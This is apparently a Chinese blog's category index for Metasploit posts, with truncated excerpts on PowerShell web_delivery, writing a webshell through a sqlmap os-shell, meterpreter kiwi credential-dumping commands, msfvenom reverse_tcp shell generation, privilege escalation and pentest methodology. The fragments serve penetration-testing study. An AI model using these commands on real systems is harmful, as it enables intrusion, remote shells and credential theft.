随笔分类 -  metasploit框架

漏洞利用工具
摘要:0x01 描述 使用powershell上线MSF,使用的不是msf中exploit/multi/handler模块,而是使用的exploit/multi/script/web_delivery类 use exploit/multi/script/web_delivery set target 2 阅读全文
posted @ 2021-05-16 16:43 追得上的梦想 阅读(2060) 评论(0) 推荐(0) 编辑
摘要:1.获取sql注入,通过sql注入,--is-dba发现为sa权限 2.获取os-shell,使用echo向网站写入webshell(需要知道网站绝对路径) * 可先在本地测试命令是否可以正常执行,然后在将命令使用在实际环境中 echo ^<%@ Page Language="Jscript"%^> 阅读全文
posted @ 2021-04-16 09:10 追得上的梦想 阅读(840) 评论(0) 推荐(0) 编辑
摘要:meterpreter kiwi命令大全 显示帮助信息 help kiwi creds_all:列举所有凭据 creds_kerberos:列举所有kerberos凭据 creds_msv:列举所有msv凭据 creds_ssp:列举所有ssp凭据 creds_tspkg:列举所有tspkg凭据 c 阅读全文
posted @ 2021-03-03 21:14 追得上的梦想 阅读(2043) 评论(0) 推荐(0) 编辑
摘要:生成不同类型的shell Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf Windows 阅读全文
posted @ 2021-03-01 20:25 追得上的梦想 阅读(649) 评论(0) 推荐(0) 编辑
摘要:前言 window本地漏洞提权,是指利用Windows系统本地进程或系统服务的漏洞,将普通用户权限(Sql Server、.net framework)权限提示至system权限 提权的原理 当你使用当前用户的权限来创建的shell通信,你当前的shell就是什么权限,就好像你使用管理员运行一个木马 阅读全文
posted @ 2020-12-05 01:42 追得上的梦想 阅读(2769) 评论(0) 推荐(0) 编辑
摘要:sqlmap <url> --time-sec 5 --random-agent --os-pwn --msf-path /usr/share/metasploit-framework/ --priv-esc -v 1 选择连接方式:一般建议使用tcp连接 选择payload的类型: 配置完成之后选 阅读全文
posted @ 2020-08-17 12:38 追得上的梦想 阅读(404) 评论(0) 推荐(0) 编辑
摘要:错误信息: [-] ***rting the Metasploit framework console...| [-] * WARNING: No database support: No database YAML file 错误原因:第一次启动和使用Matasploit框架的时候没有经行MSF数 阅读全文
posted @ 2020-08-17 12:35 追得上的梦想 阅读(130) 评论(0) 推荐(0) 编辑
摘要:标准渗透测试流程:1.前期交互阶段 2.情报收集阶段 3.威胁建模阶段 4.漏洞分析阶段 5.渗透攻击阶段 6.后渗透阶段 7.报告阶段 1.前期交互阶段 确定测试的范围、目标、以及可能的特殊需求 渗透测试的目标: 预期达到的效果和低腰效果 例: 这次渗透测试的商业需求是什么 这次测试时出于监督审核 阅读全文
posted @ 2020-02-23 10:27 追得上的梦想 阅读(760) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示